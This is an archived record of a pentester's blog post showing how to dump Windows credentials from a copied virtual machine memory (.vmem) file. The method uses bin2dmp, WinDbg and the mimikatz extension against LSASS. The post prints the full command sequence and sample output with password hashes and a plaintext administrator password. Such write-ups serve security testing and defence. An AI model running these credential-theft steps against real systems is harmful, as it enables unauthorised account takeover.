{
	"id": "7396aacd-9569-4bd3-93ee-754644c9db31",
	"created_at": "2026-04-06T00:12:14.054658Z",
	"updated_at": "2026-04-10T03:21:13.546284Z",
	"deleted_at": null,
	"sha1_hash": "5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5",
	"title": "Mimikatz Against Virtual Machine Memory Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 103147,
	"plain_text": "Mimikatz Against Virtual Machine Memory Part 1\r\nBy Ar-themes\r\nArchived: 2026-04-05 22:38:48 UTC\r\nPentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells.\r\nThis post and part 2 are like that for me. I can't count the number of times I've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like Volatility on them to carve out useful pieces of the file system but not memory.\r\nWhile doing some research on vCenter/ESXi I came across a couple of blog posts on the subject:\r\nhttp://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/\r\nhttp://blog.gentilkiwi.com/securite/mimikatz/windbg-extension\r\nhttp://vniklas.djungeln.se/2013/11/29/password-dump-from-a-hyper-v-virtual-machines-memory/\r\nThis of course sent me down the rabbit hole to see if I could do it.\r\nRemko's post mentions you need a few things:\r\nThe Windows debugging tools (WinDbg):\r\nhttp://www.remkoweijnen.nl/blog/2013/06/13/debugging-tools-for-windows-direct-download/\r\nhttp://blog.gentilkiwi.com/programmes/windbg\r\nThe MoonSols Windows Memory Toolkit (for bin2dmp):\r\nhttp://www.moonsols.com/windows-memory-toolkit/\r\nA current mimikatz build, which ships the WinDbg extension (mimilib.dll):\r\nhttps://github.com/gentilkiwi/mimikatz\r\nGotcha #1: The free version of the Windows Memory Toolkit limits the guest OS and architecture you can do this on: 32-bit only, and only up to Windows Server 2008.\r\nThe process:\r\n#1 Copy the .vmem (or .vmsn snapshot) file from the remote host. These files hold the guest's RAM, so read access to the datastore is all this needs; nothing runs inside the guest.\r\n#2 Use MoonSols bin2dmp to convert it into a Microsoft crash dump (.dmp) file. 
(I'm using the paid version below.)\r\nC:\\Users\\user\\Desktop\u003eBin2Dmp.exe \"Windows Server 2008 x64-b2afd86a.vmem\" win2k8.dmp\r\nbin2dmp - v2.1.0.20140115\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 1 of 5\n\nConvert raw memory dump images into Microsoft crash dump files.\r\nCopyright (C) 2007 - 2014, Matthieu Suiche\r\nCopyright (C) 2012 - 2014, MoonSols Limited\r\nInitializing memory descriptors... Done.\r\nDirectory Table Base is 0x124000\r\nLooking for Kernel Base...\r\nLooking for kernel variables... Done.\r\nLoading file... Done.\r\nnt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0\r\nstuff happens\r\n[0x0000000040000000 of 0x0000000040000000]  [0x000000001DAFE000 of 0x000000\r\nMD5 = E8C2F318FA528285281C21B3141E7C51\r\nTotal time for the conversion: 0 minutes 14 seconds.\r\nYou should now have a .dmp file you can load into WinDbg.\r\n#3 Load the .dmp file into WinDbg (File \u003e Open Crash Dump).\r\nGotcha #2: You may have to run .symfix and .reload so the kernel symbols resolve; without them !process can't walk the process list and the extension can't find LSASS.\r\nkd\u003e .symfix\r\nkd\u003e .reload\r\nLoading Kernel Symbols\r\n...............................................................\r\n................................................................\r\n.....\r\nLoading User Symbols\r\nLoading unloaded module list\r\n....\r\n#4 Load the mimilib.dll extension\r\nkd\u003e .load C:\\users\\user\\desktop\\mimilib.dll\r\n .#####.  mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (May 25 2014 21:48:13)\r\n.## ^ ##. Windows build 6002\r\n## / \\ ## /* * *\r\n## \\ / ##  Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\n'## v ##'  http://blog.gentilkiwi.com/mimikatz       (oe.eo)\r\n '#####'                 WinDBG extension ! 
* * */\r\n===================================\r\n#     * Kernel mode *     #\r\n===================================\r\n# Search for LSASS process\r\n0: kd\u003e !process 0 0 lsass.exe\r\n# Then switch to its context\r\n0: kd\u003e .process /r /p\r\n# And finally :\r\n0: kd\u003e !mimikatz\r\n===================================\r\n#     * User mode *     #\r\n===================================\r\n0:000\u003e !mimikatz\r\n===================================\r\nThe extension's banner walks you through the rest.\r\n#5 Find the lsass.exe process\r\nkd\u003e !process 0 0 lsass.exe\r\nPROCESS fffffa800dba26d0\r\n  SessionId: 0 Cid: 023c  Peb: 7fffffd4000 ParentCid: 01e4\r\n  DirBase: 2e89f000 ObjectTable: fffff880056562c0 HandleCount: 1092.\r\n  Image: lsass.exe\r\n#6 Switch to the lsass.exe context (the EPROCESS address printed above, fffffa800dba26d0 in this case)\r\nkd\u003e .process /r /p fffffa800dba26d0\r\nImplicit process is now fffffa80`0dba26d0\r\nLoading User Symbols\r\n................................................................\r\n......................\r\n#7 Run !mimikatz against that context\r\nkd\u003e !mimikatz\r\nAuthentication Id : 0 ; 996 (00000000:000003e4)\r\nSession      : Service from 0\r\nUser Name     : WIN-3C4WXGGN8QE$\r\nDomain      : UNLUCKYCOMPANY\r\nSID        : S-1-5-20\r\nmsv :\r\n[00000002] Primary\r\n* Username : WIN-3C4WXGGN8QE$\r\n* Domain  : UNLUCKYCOMPANY\r\n* NTLM   : ea2ed0b14406a168791adf5aee78fd0b\r\n* SHA1   : ab7bd2f6a64cf857c9d69dd65916622e3dc25424\r\ntspkg : KO\r\n---SNIP---\r\nAuthentication Id : 0 ; 173319 (00000000:0002a507)\r\nSession      : Interactive from 1\r\nUser Name     : Administrator\r\nDomain      : UNLUCKYCOMPANY\r\nSID        : S-1-5-21-2086621178-2413078777-1398328459-500\r\nmsv :\r\n[00000002] Primary\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* LM    : e52cac67419a9a2238f10713b629b565\r\n* NTLM   : 64f12cddaa88057e06a81b54e73b949b\r\n* SHA1   : 
cba4e545b7ec918129725154b29f055e4cd5aea8\r\ntspkg :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* Password : Password1\r\nwdigest :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* Password : Password1\r\nkerberos :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY.NET\r\n* Password : Password1\r\n* Key List\r\n---SNIP---\r\nThe plaintext from tspkg, wdigest and kerberos is expected here: build 6002 is Vista SP2 / Server 2008 SP2, where those security packages keep reversible copies of interactive logon credentials in LSASS memory, so a copied .vmem gives you exactly what mimikatz would give you on the live box.\r\nThere were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.\r\nCG\r\nSource: http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html"
	],
	"report_names": [
		"mimikatz-against-virtual-machine-memory.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434334,
	"ts_updated_at": 1775791273,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.pdf",
		"text": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.txt",
		"img": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.jpg"
	}
}